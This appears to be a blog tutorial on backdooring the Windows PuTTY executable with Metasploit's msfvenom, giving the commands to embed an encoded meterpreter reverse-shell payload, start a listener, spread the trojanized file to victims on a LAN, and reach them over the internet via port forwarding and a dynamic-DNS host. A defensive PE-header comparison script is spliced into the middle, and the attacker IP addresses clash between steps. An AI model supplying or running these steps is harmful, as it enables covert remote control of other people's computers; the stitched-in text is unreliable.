Today, we’re going to create a backdoored Windows executable using msfvenom from the Metasploit Framework.

How To Backdoor Windows Executables Using Metasploit

First make sure Metasploit is already installed.

If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)

1- Open a terminal and download PuTTY using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in the root directory when I used the above command, so PuTTY got downloaded to the /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe

The above command generates an EXE file named evilputty.exe. This is our backdoored executable file.

3- Start Metasploit.

msfconsole

4- Start Metasploit’s reverse handler to get a reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit

5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for the victim. When the victim opens evilputty.exe, you will get a reverse shell on your Metasploit handler. Happy Hacking 🙂
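From the receiving side, a copy of putty.exe that arrives this way can be checked against a copy obtained directly from the publisher. The script below is an added example, not part of the original tutorial: it compares the PE entry point and section table of a trusted file and a suspect file and reports structural differences. It makes no assumption about how msfvenom alters the template; the helper build_headers and the CLEAN/MODIFIED samples are constructed for the demonstration.

```python
import struct
EXEC, WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE

def pe_layout(data):
    """Return (entry_point_rva, {section_name: (rva, virtual_size, flags)})."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", data, 0x3C)             # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _m, nsec, _t, _p, _n, optsz, _c = struct.unpack_from("<HHIIIHH", data, pe + 4)
    entry, = struct.unpack_from("<I", data, pe + 24 + 16)  # AddressOfEntryPoint
    sections = {}
    for i in range(nsec):                                  # 40-byte section headers
        f = struct.unpack_from("<8sIIIIIIHHI", data, pe + 24 + optsz + 40 * i)
        sections[f[0].rstrip(b"\0").decode("latin-1")] = (f[2], f[1], f[9])
    return entry, sections

def compare_pe(reference, suspect):
    """List structural differences between a trusted copy and a suspect copy."""
    ref_entry, ref_secs = pe_layout(reference)
    sus_entry, sus_secs = pe_layout(suspect)
    findings = []
    if ref_entry != sus_entry:
        findings.append(f"entry point moved: {ref_entry:#x} -> {sus_entry:#x}")
    for name, (rva, size, flags) in sus_secs.items():
        if name not in ref_secs:
            findings.append(f"added section {name!r}")
        elif ref_secs[name] != (rva, size, flags):
            findings.append(f"section {name!r} changed")
        if flags & EXEC and flags & WRITE:
            findings.append(f"section {name!r} is writable and executable")
    findings += [f"removed section {n!r}" for n in ref_secs if n not in sus_secs]
    return findings

def build_headers(entry, secs):
    """Constructed PE headers only (no code or data), used as sample input."""
    hdr = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(0xE0, b"\0")
    rows = [struct.pack("<8sIIIIIIHHI", n, vs, va, 0, 0, 0, 0, 0, 0, fl) for n, va, vs, fl in secs]
    return hdr + opt + b"".join(rows)

# Constructed samples: a two-section "vendor" layout and a copy with an extra section.
TEXT, DATA = (b".text", 0x1000, 0x5000, 0x60000020), (b".data", 0x6000, 0x1000, 0xC0000040)
CLEAN = build_headers(0x1000, [TEXT, DATA])
MODIFIED = build_headers(0x7000, [TEXT, DATA, (b".extra", 0x7000, 0x1000, 0xE0000020)])

if __name__ == "__main__":
    print("\n".join(compare_pe(CLEAN, MODIFIED)))
```

On real files, pass the bytes of the publisher's download and of the copy under suspicion; an empty result only means the headers match, so a full-file hash comparison against the publisher's checksum is still needed.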

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports. In case you’re wondering how to port forward, here’s how to do it.

Follow my tutorial for a better understanding of how Metasploit works over the internet.

Once you have successfully forwarded and opened your port:

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exe

Your public IP address might not be static, so in that case you should use NO-IP DNS to get a static address.

Simply write your NO-IP host in LHOST=example.noip.com

If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!